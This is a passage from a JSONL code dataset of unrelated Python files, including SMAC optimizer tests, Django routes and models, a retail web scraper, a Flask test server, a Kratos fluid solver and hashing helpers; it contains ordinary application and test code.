range(0, 20)]\n smbo.runhistory = RunHistory(aggregate_func=average_cost)\n for i in range(0, len(previous_configs)):\n smbo.runhistory.add(previous_configs[i], i, 10, 1)\n smbo.model = mock.Mock(spec=RandomForestWithInstances)\n smbo.acquisition_func._compute = mock.Mock(spec=RandomForestWithInstances)\n smbo.acquisition_func._compute.side_effect = side_effect\n\n X = smbo.rng.rand(10, 2)\n Y = smbo.rng.rand(10, 1)\n\n challengers = smbo.choose_next(X, Y)\n x = [c for c in challengers]\n\n self.assertEqual(smbo.model.train.call_count, 1)\n self.assertEqual(len(x), 2020)\n num_random_search = 0\n num_local_search = 0\n for i in range(0, 2020, 2):\n # print(x[i].origin)\n self.assertIsInstance(x[i], Configuration)\n if 'Random Search (sorted)' in x[i].origin:\n num_random_search += 1\n elif 'Local Search' in x[i].origin:\n num_local_search += 1\n # number of local search configs has to be least 10\n # since x can have duplicates\n # which can be associated with the local search\n 
self.assertGreaterEqual(num_local_search, 10)\n for i in range(1, 2020, 2):\n self.assertIsInstance(x[i], Configuration)\n self.assertEqual(x[i].origin, 'Random Search')\n\n def test_choose_next_empty_X(self):\n smbo = SMAC(self.scenario, rng=1).solver\n smbo.acquisition_func._compute = mock.Mock(spec=RandomForestWithInstances)\n smbo._get_next_by_random_search = mock.Mock(spec=smbo._get_next_by_random_search)\n smbo._get_next_by_random_search.return_value = [[0, 0], [0, 1], [0, 2]]\n\n X = np.zeros((0, 2))\n Y = np.zeros((0, 1))\n\n x = smbo.choose_next(X, Y)\n self.assertEqual(x, [0, 1, 2])\n self.assertEqual(smbo._get_next_by_random_search.call_count, 1)\n self.assertEqual(smbo.acquisition_func._compute.call_count, 0)\n\n def test_choose_next_empty_X_2(self):\n smbo = SMAC(self.scenario, rng=1).solver\n\n X = np.zeros((0, 2))\n Y = np.zeros((0, 1))\n\n x = smbo.choose_next(X, Y)\n self.assertEqual(len(x), 1)\n self.assertIsInstance(x[0], Configuration)\n\n @mock.patch('smac.optimizer.smbo.convert_configurations_to_array')\n @mock.patch.object(EI, '__call__')\n @mock.patch.object(ConfigurationSpace, 'sample_configuration')\n def test_get_next_by_random_search_sorted(self,\n patch_sample,\n patch_ei,\n patch_impute):\n values = (10, 1, 9, 2, 8, 3, 7, 4, 6, 5)\n patch_sample.return_value = [ConfigurationMock(i) for i in values]\n patch_ei.return_value = np.array([[_] for _ in values], dtype=float)\n patch_impute.side_effect = lambda l: values\n smbo = SMAC(self.scenario, rng=1).solver\n rval = smbo._get_next_by_random_search(10, True)\n self.assertEqual(len(rval), 10)\n for i in range(10):\n self.assertIsInstance(rval[i][1], ConfigurationMock)\n self.assertEqual(rval[i][1].value, 10 - i)\n self.assertEqual(rval[i][0], 10 - i)\n self.assertEqual(rval[i][1].origin, 'Random Search (sorted)')\n\n # Check that config.get_array works as desired and imputation is used\n # in between\n np.testing.assert_allclose(patch_ei.call_args[0][0],\n np.array(values, dtype=float))\n\n @mock.patch.object(ConfigurationSpace, 'sample_configuration')\n def test_get_next_by_random_search(self, patch):\n def side_effect(size):\n return [ConfigurationMock()] * size\n patch.side_effect = side_effect\n smbo = SMAC(self.scenario, rng=1).solver\n rval = smbo._get_next_by_random_search(10, False)\n self.assertEqual(len(rval), 10)\n for i in range(10):\n self.assertIsInstance(rval[i][1], ConfigurationMock)\n self.assertEqual(rval[i][1].origin, 'Random Search')\n self.assertEqual(rval[i][0], 0)\n\n @mock.patch.object(LocalSearch, 'maximize')\n def test_get_next_by_local_search(self, patch):\n # Without known incumbent\n class SideEffect(object):\n def __init__(self):\n self.call_number = 0\n\n def __call__(self, *args, **kwargs):\n rval = 9 - self.call_number\n self.call_number += 1\n return (ConfigurationMock(rval), [rval])\n\n patch.side_effect = SideEffect()\n smbo = SMAC(self.scenario, rng=1).solver\n rand_confs = smbo.config_space.sample_configuration(size=9)\n rval = smbo._get_next_by_local_search(init_points=rand_confs)\n self.assertEqual(len(rval), 9)\n self.assertEqual(patch.call_count, 9)\n for i in range(9):\n self.assertIsInstance(rval[i][1], ConfigurationMock)\n self.assertEqual(rval[i][1].value, 9 - i)\n self.assertEqual(rval[i][0], 9 - i)\n self.assertEqual(rval[i][1].origin, 'Local Search')\n\n # With known incumbent\n patch.side_effect = SideEffect()\n smbo.incumbent = 'Incumbent'\n rval = smbo._get_next_by_local_search(init_points=[smbo.incumbent]+rand_confs)\n self.assertEqual(len(rval), 10)\n 
self.assertEqual(patch.call_count, 19)\n # Only the first local search in each iteration starts from the\n # incumbent\n self.assertEqual(patch.call_args_list[9][0][0], 'Incumbent')\n for i in range(10):\n self.assertEqual(rval[i][1].origin, 'Local Search')\n\n @mock.patch.object(SingleConfigInitialDesign, 'run')\n def test_abort_on_initial_design(self, patch):\n def target(x):\n return 5\n patch.side_effect = FirstRunCrashedException()\n scen = Scenario({'cs': test_helpers.get_branin_config_space(),\n 'run_obj': 'quality', 'output_dir': '',\n 'abort_on_first_run_crash': 1})\n smbo = SMAC(scen, tae_runner=target, rng=1).solver\n self.assertRaises(FirstRunCrashedException, smbo.run)\n\n def test_intensification_percentage(self):\n def target(x):\n return 5\n def get_smbo(intensification_perc):\n \"\"\" Return SMBO with intensification_percentage. \"\"\"\n scen = Scenario({'cs': test_helpers.get_branin_config_space(),\n 'run_obj': 'quality', 'output_dir': '',\n 'intensification_percentage' : intensification_perc})\n return SMAC(scen, tae_runner=target, rng=1).solver\n # Test for valid values\n smbo = get_smbo(0.3)\n self.assertAlmostEqual(3.0, smbo._get_timebound_for_intensification(7.0))\n smbo = get_smbo(0.5)\n self.assertAlmostEqual(0.03, smbo._get_timebound_for_intensification(0.03))\n smbo = get_smbo(0.7)\n self.assertAlmostEqual(1.4, smbo._get_timebound_for_intensification(0.6))\n # Test for invalid <= 0\n smbo = get_smbo(0)\n self.assertRaises(ValueError, smbo.run)\n smbo = get_smbo(-0.2)\n self.assertRaises(ValueError, smbo.run)\n # Test for invalid >= 1\n smbo = get_smbo(1)\n self.assertRaises(ValueError, smbo.run)\n smbo = get_smbo(1.2)\n self.assertRaises(ValueError, smbo.run)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/test_smbo/test_smbo.py","file_name":"test_smbo.py","file_ext":"py","file_size_in_byte":14426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"451912684","text":"from django.conf.urls import url\nfrom . 
import views\nfrom django.views.generic import TemplateView\n\napp_name = 'auth_model'\n\nurlpatterns = [\n url(r'^login/$', TemplateView.as_view(template_name='auth_model/login.html'), name='login'), # displays a login page\n url(r'^authenticate/$', views.authenticate_method, name='authenticate_method'), # this method checks for the user with given credentials\n url(r'^success/$', TemplateView.as_view(template_name='auth_model/success.html'), name='success'), # success message after login and logout link\n url(r'^logout/$', views.logout, name='logout'), # logout function\n url(r'^create_new_user/$', views.create_new_user, name='create_new_user'), # method to create a new user using the given credentials\n url(r'^sign_up/$', TemplateView.as_view(template_name='auth_model/sign_up.html'), name='sign_up'), # sign up page\n]\n","sub_path":"auth_model/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"84516917","text":"import os\nimport yaml\n\n# The purpose of this file is to load the yaml file in memory and pass it\n# around to other modules.\n\nconfig_path = os.environ.get('some shell variable if you want')\nif config_path is None:\n config = yaml.safe_load(open(os.path.dirname(__file__) + '/../settings.yaml'))\nelse:\n config = yaml.safe_load(open(config_path))\n","sub_path":"spaceshare/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"532706153","text":"# coding=utf-8\r\nclass Solution(object):\r\n def rotate(self, string, k):\r\n # Rotate the string left by k characters\r\n n = len(string)\r\n if k == 0 or n == 0:\r\n return\r\n \r\n k %= n # handle the case where k is greater than n\r\n\r\n s = (string[k-1::-1] + string[:k-1:-1])[::-1]\r\n return s\r\n \r\n\r\na = Solution()\r\nc = 'abcdefg'\r\nb = a.rotate(c,3)\r\nprint(b)\r\n","sub_path":"LeetCode/rotate_str.py","file_name":"rotate_str.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"470591188","text":"import json\nimport logging\nimport re\nfrom decimal import Decimal\n\nfrom bs4 import BeautifulSoup\n\nfrom storescraper.product import Product\nfrom storescraper.store import Store\nfrom storescraper.categories import EXTERNAL_STORAGE_DRIVE, MEMORY_CARD, \\\n MOUSE, KEYBOARD, HEADPHONES, STEREO_SYSTEM, TABLET, USB_FLASH_DRIVE, \\\n GAMING_CHAIR, VIDEO_GAME_CONSOLE, MICROPHONE\nfrom storescraper.utils import session_with_proxy, remove_words\n\n\nclass GamesLegends(Store):\n @classmethod\n def categories(cls):\n return [\n MOUSE,\n KEYBOARD,\n HEADPHONES,\n GAMING_CHAIR,\n VIDEO_GAME_CONSOLE,\n MICROPHONE,\n EXTERNAL_STORAGE_DRIVE,\n USB_FLASH_DRIVE,\n STEREO_SYSTEM,\n TABLET,\n MEMORY_CARD,\n ]\n\n @classmethod\n def discover_urls_for_category(cls, category, extra_args=None):\n url_extension = [\n ['9-consolas', VIDEO_GAME_CONSOLE],\n ['85-discos-externos', EXTERNAL_STORAGE_DRIVE],\n ['88-pendrives', USB_FLASH_DRIVE],\n ['90-tarjetas-de-memoria-', MEMORY_CARD],\n ['92-audifonos-', HEADPHONES],\n ['97-parlantes-', STEREO_SYSTEM],\n ['99-teclados-', KEYBOARD],\n ['100-audifonos-gamers-', HEADPHONES],\n ['102-teclados-gamers-', KEYBOARD],\n ['103-mouse', MOUSE],\n ['105-sillas', GAMING_CHAIR],\n ['106-microfonos-', MICROPHONE],\n ['120-tablets', TABLET],\n ]\n session = session_with_proxy(extra_args)\n product_urls = []\n for url_extension, local_category in 
url_extension:\n if local_category != category:\n continue\n page = 1\n while True:\n if page > 10:\n raise Exception('page overflow: ' + url_extension)\n url_webpage = 'https://www.gameslegends.cl/{}?page=' \\\n '{}'.format(url_extension, page)\n print(url_webpage)\n res = session.get(url_webpage)\n\n if res.status_code == 404:\n if page == 1:\n logging.warning('Empty category: ' + url_extension)\n break\n\n soup = BeautifulSoup(res.text, 'html.parser')\n product_containers = soup.find('div', 'products')\n\n if not product_containers:\n if page == 1:\n logging.warning('Empty category: ' + url_extension)\n break\n\n product_containers = product_containers.findAll(\n 'article', 'product-miniature')\n\n if not product_containers:\n if page == 1:\n logging.warning('Empty category: ' + url_extension)\n break\n for container in product_containers:\n product_url = container.find('a')['href']\n product_urls.append(product_url)\n page += 1\n return product_urls\n\n @classmethod\n def products_for_url(cls, url, category=None, extra_args=None):\n print(url)\n session = session_with_proxy(extra_args)\n response = session.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n key = soup.find('input', {'id': 'product_page_product_id'})['value']\n name = soup.find('title').text.strip()\n sku = soup.find('span', {'itemprop': 'sku'}).text.replace('SKU: ', '')\n\n if 'disabled' in soup.find('button', 'add-to-cart').attrs:\n stock = 0\n else:\n stock = -1\n\n price = Decimal(soup.find('span', {'itemprop': 'price'})['content'])\n\n picture_urls = []\n picture_container = soup.find('div', 'swiper-wrapper')\n for i in picture_container.findAll('img'):\n picture_urls.append(i['content'])\n\n p = Product(\n name,\n cls.__name__,\n category,\n url,\n url,\n key,\n stock,\n price,\n price,\n 'CLP',\n sku=sku,\n picture_urls=picture_urls,\n part_number=sku\n )\n return [p]\n","sub_path":"storescraper/stores/games_legends.py","file_name":"games_legends.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45066828","text":"\"\"\"\nreference: fluent python p.121\n\"\"\"\n\nimport unicodedata\n\n\ndef shave_marks(txt):\n # Decompose all characters into base characters and combining marks.\n norm_txt = unicodedata.normalize('NFD', txt)\n\n # Filter out all combining marks\n shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))\n\n # Recompose all characters\n return unicodedata.normalize('NFC', shaved)\n\n\norder = '“Herr Voß: • 1⁄2 cup of ŒtkerTM caffè latte • bowl of açaí.”'\nprint(shave_marks(order)) # '“Herr Voß: • 1⁄2 cup of ŒtkerTM caffe latte • bowl of acai.”'\n\nGreek = 'Ζέφυρος, Zéfiro'\nprint(shave_marks(Greek)) # 'Ζεφυρος, Zefiro'\n","sub_path":"src/fluent_python/data_structure/text_vs_byte/normalize/normalize_06_diacritics_01_remove_all.py","file_name":"normalize_06_diacritics_01_remove_all.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"345815957","text":"import logging\nimport threading\nimport time\n\nimport requests\nfrom flask import Flask, request, Response\n\nfrom pyctuator.pyctuator import Pyctuator\nfrom tests.conftest import PyctuatorServer\n\n\nclass FlaskPyctuatorServer(PyctuatorServer):\n def __init__(self) -> None:\n self.app = Flask(\"Flask Example Server\")\n self.thread = threading.Thread(target=self.app.run)\n\n self.pyctuator = Pyctuator(\n self.app,\n \"Flask 
Pyctuator\",\n \"http://localhost:5000\",\n \"http://localhost:5000/pyctuator\",\n \"http://localhost:8001/register\",\n registration_interval_sec=1\n )\n\n @self.app.route(\"/shutdown\", methods=[\"POST\"])\n # pylint: disable=unused-variable\n def shutdown() -> str:\n logging.info(\"Flask server shutting down...\")\n func = request.environ.get(\"werkzeug.server.shutdown\")\n if func is None:\n raise RuntimeError(\"Not running with the Werkzeug Server\")\n func()\n return \"Flask server off\"\n\n @self.app.route(\"/logfile_test_repeater\")\n # pylint: disable=unused-variable\n def logfile_test_repeater() -> str:\n repeated_string: str = str(request.args.get(\"repeated_string\"))\n logging.error(repeated_string)\n return repeated_string\n\n @self.app.route(\"/httptrace_test_url\", methods=[\"GET\"])\n # pylint: disable=unused-variable\n def get_httptrace_test_url() -> Response:\n # Sleep if requested to sleep - used for asserting httptraces timing\n sleep_sec = request.args.get(\"sleep_sec\")\n if sleep_sec:\n logging.info(\"Sleeping %s seconds before replying\", sleep_sec)\n time.sleep(int(sleep_sec))\n\n # Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly\n resp = Response()\n resp.headers[\"resp-data\"] = str(request.headers.get(\"User-Data\"))\n return resp\n\n def start(self) -> None:\n logging.info(\"Starting Flask server\")\n self.thread.start()\n while True:\n time.sleep(0.5)\n try:\n requests.get(\"http://localhost:5000/pyctuator\")\n logging.info(\"Flask server started\")\n return\n except requests.exceptions.RequestException: # Catches all exceptions that Requests raises!\n pass\n\n def stop(self) -> None:\n logging.info(\"Stopping Flask server\")\n self.pyctuator.stop()\n requests.post(\"http://localhost:5000/shutdown\")\n self.thread.join()\n logging.info(\"Flask server is shutdown\")\n","sub_path":"tests/flask_test_server.py","file_name":"flask_test_server.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"571375240","text":"from musicloud.core.management.commands import FreezeQueryCommand\n\nfrom music21 import converter\nfrom music21.base import Music21ObjectException\nfrom pymuco import rhythm\n\nimport csv, chardet, os, pickle\n\nclass Command(FreezeQueryCommand):\n\n help = 'Query the database and store the result as a pickled dictionary'\n\n def add_arguments(self, parser):\n \n super(Command, self).add_arguments(parser)\n\n parser.add_argument('-r', '--resolution', default=32, type=int, help='Number of grid positions per whole note duration.')\n\n def make_row(self, item, *, resolution, **options):\n\n humdrum_path = item.annotation_queryset('humdrum-path').all()[0].data\n\n # Load humdrum as M21 score\n try:\n score = converter.parse(humdrum_path)\n except UnicodeDecodeError:\n humdrum_bin = open(humdrum_path, 'rb')\n encoding_info = chardet.detect(humdrum_bin.read())\n\n humdrum_file = open(humdrum_path, encoding=encoding_info['encoding']) \n score = converter.parseData(humdrum_file.read(), format='humdrum')\n\n try:\n grid = rhythm.score_to_grid(score, resolution)\n except ValueError as error:\n print(\"[DataItem:%d] Couldn't represent score on a %d grid.\\n\\tHumdrum path: %s\" % (item.id, resolution, humdrum_path))\n print(error)\n return None\n except Exception as error:\n print(\"[ERROR] [DataItem:%d] An error occured while transforming the grid.\\n\\tHumdrum path: %s\" % (item.id, humdrum_path))\n print(error)\n return 
None\n\n\n try:\n (meter, phase, string) = rhythm.get_score_meter(score, resolution)\n except Music21ObjectException as error:\n print(\"[DataItem:%d] Skipping rhythm without time signature.\\n\\tHumdrum path: %s\" % (item.id, humdrum_path))\n print(error)\n return None\n except Exception as error:\n print(\"[ERROR] [DataItem:%d] An error occured while transforming the grid.\\n\\tHumdrum path: %s\" % (item.id, humdrum_path))\n print(error)\n return None\n\n row = {\n 'name':item.name,\n 'path':humdrum_path,\n 'properties':dict([(p.type.name, p.value) for p in item.properties.all()]),\n 'grid':grid,\n 'meter':meter,\n 'meter_string':string,\n 'phase':phase,\n }\n\n return row\n\n\n","sub_path":"musicloud/musicloud/core/management/commands/freeze_essen.py","file_name":"freeze_essen.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"427600674","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def isPalindrome(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: bool\r\n \"\"\"\r\n nodes = []\r\n ptr = head\r\n while ptr:\r\n nodes.append(ptr.val)\r\n ptr = ptr.next\r\n reverse = nodes[::-1]\r\n for index, i in enumerate(nodes):\r\n if i != reverse[index]:\r\n return False\r\n return True","sub_path":"leetcode/234. Palindrome Linked List/234._Palindrome_Linked_List_2.py","file_name":"234._Palindrome_Linked_List_2.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"75560001","text":"from django.db import models\nfrom profiles.models import Profile\n\n# Create your models here.\nclass Review(models.Model):\n RATINGS=(('0', '0'),\n ('0.5', '0.5'),\n ('1.0', '1.0'),\n ('1.5', '1.5'),\n ('2.0', '2.0'),\n ('2.5', '2.5'),\n ('3.0', '3.0'),\n ('3.5', '3.5'),\n ('4.0', '4.0'),\n ('4.5', '4.5'),\n ('5.0', '5.0'))\n body = models.TextField(max_length=500, blank=True)\n reviewer = models.ForeignKey(Profile, related_name='reviewer', on_delete=models.CASCADE)\n reviewed = models.ForeignKey(Profile, related_name='reviewed', on_delete=models.CASCADE)\n ratings = models.CharField(max_length=3, blank=False, choices=RATINGS)\n date=models.DateTimeField('date posted')","sub_path":"wsgi/static/wsgi/static/review/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"366759570","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import Avg\nfrom django.db.models.functions import Coalesce\n\nfrom companies.models.company import Company\nfrom companies.models.company_internship_review import CompanyInternshipReview\n\n\nclass CompaniesDataRepository(object):\n\n def get_company_by_id(self, company_id):\n try:\n return Company.objects.get(pk=company_id)\n except Company.DoesNotExist:\n pass\n\n def get_companies_list(self):\n return Company.objects.order_by('name').all()\n\n def get_companies_with_average_ratings_data(self, city=None, faculty=None):\n companies = Company.objects.values('name', 'id', 'logo_image').annotate(\n recommendations_score=Coalesce(Avg('companyinternshipreview__recommendation'), 0.0)\n ).annotate(\n apply_skills_score=Coalesce(Avg('companyinternshipreview__apply_skills'), 0.0)\n ).annotate(\n 
learn_new_score=Coalesce(Avg('companyinternshipreview__learn_new'), 0.0)\n ).order_by('-recommendations_score', '-apply_skills_score', '-learn_new_score')\n\n if city:\n companies = companies.filter(cities__name=city)\n\n if faculty:\n companies = companies.filter(companyinternshipreview__user__student__faculty__name=faculty)\n\n return companies\n\n def find_companies_which_names_start_with(self, query=None):\n companies = self.get_companies_list()\n if query:\n companies = companies.filter(name__istartswith=query)\n return companies\n\n def get_company_by_name(self, company_name):\n try:\n return Company.objects.get(name=company_name)\n except Company.DoesNotExist:\n pass\n\n def add_company(self, company_name, city):\n company = Company()\n company.name = company_name\n company.save()\n company.cities.add(city)\n return company\n\n def add_company_office(self, company, city):\n company.cities.add(city)\n company.save()\n\n def get_company_internships_reviews(self, company):\n return CompanyInternshipReview.objects.filter(company=company)\n\n def get_companies_average_ratings(self, companies_ids=None):\n if not companies_ids:\n return None\n\n return CompanyInternshipReview.objects.values('company').filter(\n company__id__in=set(companies_ids)\n ).annotate(\n recommendations_score=Avg('recommendation')\n ).annotate(\n apply_skills_score=Avg('apply_skills')\n ).annotate(\n learn_new_score=Avg('learn_new')\n )\n\n def get_company_average_rating(self, company_id):\n if not company_id:\n return None\n\n return CompanyInternshipReview.objects.values('company').filter(\n company__id=company_id\n ).annotate(\n recommendations_score=Avg('recommendation')\n ).annotate(\n apply_skills_score=Avg('apply_skills')\n ).annotate(\n learn_new_score=Avg('learn_new')\n )","sub_path":"src/companies/repositories/companies_data_repository.py","file_name":"companies_data_repository.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"450577582","text":"## Importing the Kratos Library\nimport KratosMultiphysics\nimport KratosMultiphysics.mpi as KratosMPI\n\n# Import applications\nimport KratosMultiphysics.TrilinosApplication as TrilinosApplication\nfrom KratosMultiphysics.TrilinosApplication import trilinos_linear_solver_factory\nfrom KratosMultiphysics.FluidDynamicsApplication.adjoint_vmsmonolithic_solver import AdjointVMSMonolithicSolver\n\nfrom KratosMultiphysics.mpi.distributed_import_model_part_utility import DistributedImportModelPartUtility\n\ndef CreateSolver(main_model_part, custom_settings):\n return AdjointVMSMonolithicMPISolver(main_model_part, custom_settings)\n\nclass AdjointVMSMonolithicMPISolver(AdjointVMSMonolithicSolver):\n\n @classmethod\n def GetDefaultParameters(cls):\n # default settings string in json format\n default_settings = KratosMultiphysics.Parameters(\"\"\"\n {\n \"solver_type\": \"trilinos_adjoint_vmsmonolithic_solver\",\n \"scheme_settings\" : {\n \"scheme_type\": \"bossak\"\n },\n \"response_function_settings\" : {\n \"response_type\" : \"drag\"\n },\n \"sensitivity_settings\" : {},\n \"model_import_settings\": {\n \"input_type\": \"mdpa\",\n \"input_filename\": \"unknown_name\"\n },\n \"material_import_settings\": {\n \"materials_filename\": \"\"\n },\n \"linear_solver_settings\" : {\n \"solver_type\" : \"amgcl\"\n },\n \"volume_model_part_name\" : \"volume_model_part\",\n \"skin_parts\": [\"\"],\n \"dynamic_tau\": 0.0,\n \"oss_switch\": 0,\n \"echo_level\": 0,\n \"time_stepping\" 
: {\n                \"automatic_time_step\" : false,\n                \"time_step\" : -0.1\n            },\n            \"domain_size\": -1,\n            \"model_part_name\": \"\",\n            \"consider_periodic_conditions\": false,\n            \"assign_neighbour_elements_to_conditions\": true\n        }\"\"\")\n\n        default_settings.AddMissingParameters(super(AdjointVMSMonolithicMPISolver, cls).GetDefaultParameters())\n        return default_settings\n\n    def __init__(self, model, custom_settings):\n        self._validate_settings_in_baseclass=True # To be removed eventually\n        super(AdjointVMSMonolithicSolver, self).__init__(model, custom_settings)\n\n        self.element_name = \"VMSAdjointElement\"\n        if self.settings[\"domain_size\"].GetInt() == 2:\n            self.condition_name = \"LineCondition\"\n        elif self.settings[\"domain_size\"].GetInt() == 3:\n            self.condition_name = \"SurfaceCondition\"\n        self.min_buffer_size = 2\n        self.element_has_nodal_properties = True\n\n        self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.OSS_SWITCH, self.settings[\"oss_switch\"].GetInt())\n        self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.DYNAMIC_TAU, self.settings[\"dynamic_tau\"].GetDouble())\n\n        KratosMultiphysics.Logger.PrintInfo(self.__class__.__name__, \"Construction of AdjointVMSMonolithicMPISolver finished.\")\n\n    def AddVariables(self):\n        ## Add variables from the base class\n        super(self.__class__, self).AddVariables()\n\n        ## Add specific MPI variables\n        self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.PARTITION_INDEX)\n\n        KratosMultiphysics.Logger.PrintInfo(self.__class__.__name__, \"Variables for the AdjointVMSMonolithicMPISolver added correctly in each processor.\")\n\n    def ImportModelPart(self):\n        ## Construct the distributed import model part utility\n        self.distributed_model_part_importer = DistributedImportModelPartUtility(self.main_model_part, self.settings)\n        ## Execute the Metis partitioning and reading\n        self.distributed_model_part_importer.ExecutePartitioningAndReading()\n\n        KratosMultiphysics.Logger.PrintInfo(self.__class__.__name__, \"MPI model reading finished.\")\n\n    def PrepareModelPart(self):\n        super(self.__class__,self).PrepareModelPart()\n        ## Construct the MPI communicators\n        self.distributed_model_part_importer.CreateCommunicators()\n\n    def _GetEpetraCommunicator(self):\n        if not hasattr(self, '_epetra_communicator'):\n            self._epetra_communicator = TrilinosApplication.CreateCommunicator()\n        return self._epetra_communicator\n\n    def _CreateScheme(self):\n        response_function = self.GetResponseFunction()\n        scheme_type = self.settings[\"scheme_settings\"][\"scheme_type\"].GetString()\n        if scheme_type == \"bossak\":\n            scheme = TrilinosApplication.TrilinosResidualBasedAdjointBossakScheme(\n                self.settings[\"scheme_settings\"],\n                response_function)\n        elif scheme_type == \"steady\":\n            scheme = TrilinosApplication.TrilinosResidualBasedAdjointSteadyScheme(response_function)\n        else:\n            raise Exception(\"Invalid scheme_type: \" + scheme_type)\n        return scheme\n\n    def _CreateLinearSolver(self):\n        linear_solver_configuration = self.settings[\"linear_solver_settings\"]\n        return trilinos_linear_solver_factory.ConstructSolver(linear_solver_configuration)\n\n    def _CreateBuilderAndSolver(self):\n        # Set the guess_row_size (guess about the number of zero entries) for the Trilinos builder and solver\n        domain_size = self.GetComputingModelPart().ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n        if domain_size == 3:\n            guess_row_size = 20*4\n        else:\n            guess_row_size = 10*3\n        # Construct the Trilinos builder 
and solver\n        trilinos_linear_solver = self._GetLinearSolver()\n        epetra_communicator = self._GetEpetraCommunicator()\n        # PATCH_INDEX is defined in the fluid application, which the module header does not import\n        import KratosMultiphysics.FluidDynamicsApplication as KratosFluid\n        if self.settings[\"consider_periodic_conditions\"].GetBool():\n            builder_and_solver = TrilinosApplication.TrilinosBlockBuilderAndSolverPeriodic(\n                epetra_communicator,\n                guess_row_size,\n                trilinos_linear_solver,\n                KratosFluid.PATCH_INDEX)\n        else:\n            builder_and_solver = TrilinosApplication.TrilinosBlockBuilderAndSolver(\n                epetra_communicator,\n                guess_row_size,\n                trilinos_linear_solver)\n        return builder_and_solver\n\n    def _CreateSolutionStrategy(self):\n        computing_model_part = self.GetComputingModelPart()\n        time_scheme = self._GetScheme()\n        linear_solver = self._GetLinearSolver()\n        builder_and_solver = self._GetBuilderAndSolver()\n        calculate_reaction_flag = False\n        reform_dof_set_at_each_step = False\n        calculate_norm_dx_flag = False\n        move_mesh_flag = False\n        return TrilinosApplication.TrilinosLinearStrategy(\n            computing_model_part,\n            time_scheme,\n            linear_solver,\n            builder_and_solver,\n            calculate_reaction_flag,\n            reform_dof_set_at_each_step,\n            calculate_norm_dx_flag,\n            move_mesh_flag)\n","sub_path":"applications/FluidDynamicsApplication/python_scripts/trilinos_adjoint_vmsmonolithic_solver.py","file_name":"trilinos_adjoint_vmsmonolithic_solver.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"354327432","text":"# -*- coding: utf-8 -*-\n\n# (c) 2017-2019, ETH Zurich, Institut fuer Theoretische Physik\n# Author: Dominik Gresch \n\"\"\"\nHelper functions for serializing objects to HDF5.\n\"\"\"\n\n\ndef nested_list_from_hdf5(hdf5_handle):\n    res = []\n    for idx in sorted(hdf5_handle, key=int):\n        res.append(list(hdf5_handle[idx][()]))\n    return res\n\n\ndef dict_from_hdf5(hdf5_handle):\n    res = dict()\n    for key in hdf5_handle:\n        res[key] = hdf5_handle[key][()]\n    return res\n","sub_path":"bands_inspect/io/_legacy/_hdf5_utils.py","file_name":"_hdf5_utils.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"104534234","text":"from cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\n\n\nasync def hash_SHA512(data):\n    digest = hashes.Hash(hashes.SHA512(), backend=default_backend())\n    digest.update(str.encode(data))\n    return digest.finalize().hex()\n\n\nasync def hash_SHA256(data):\n    digest = hashes.Hash(hashes.SHA256(), backend=default_backend())\n    digest.update(str.encode(data))\n    return digest.finalize().hex()\n\n\nasync def create_uuid(data):\n    return await hash_SHA256(data)","sub_path":"app/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"596894970","text":"\"\"\"\nTests for lss.py\n\n\"\"\"\nimport sys\nimport unittest\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom quantecon.lss import LinearStateSpace\nfrom nose.tools import raises\n\n\nclass TestLinearStateSpace(unittest.TestCase):\n\n    def setUp(self):\n        # Example 1\n        A = .95\n        C = .05\n        G = 1.\n        mu_0 = .75\n\n        self.ss1 = LinearStateSpace(A, C, G, mu_0=mu_0)\n\n        # Example 2\n        ρ1 = 0.5\n        ρ2 = 0.3\n        α = 0.5\n\n        A = np.array([[ρ1, ρ2, α], [1, 0, 0], [0, 0, 1]])\n        C = np.array([[1], [0], [0]])\n        G = np.array([[1, 0, 0]])\n        mu_0 